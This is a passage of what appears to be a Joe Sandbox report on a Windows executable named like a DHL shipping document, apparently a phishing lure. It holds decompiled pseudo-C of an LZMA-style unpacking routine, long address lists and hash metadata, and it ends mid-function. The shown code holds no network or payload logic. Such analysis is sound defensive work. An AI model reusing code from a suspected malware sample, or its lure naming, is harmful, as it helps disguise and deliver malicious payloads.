												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                        0x00000000
                        0x00406ffe
                        0x00406ffe
                        0x00407002
                        0x00407023
                        0x0040702a
                        0x00407030
                        0x00407036
                        0x00407048
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407004
                        0x0040700a
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x004073ce
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x004075e5
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00407601
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743e
                        0x00407441
                        0x00407441
                        0x00407447
                        0x00407447
                        0x00406be3
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x00000000
                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c5c
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00406dc8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb
                        0x00000000
                        0x00407002

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                        • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                        • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                        • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
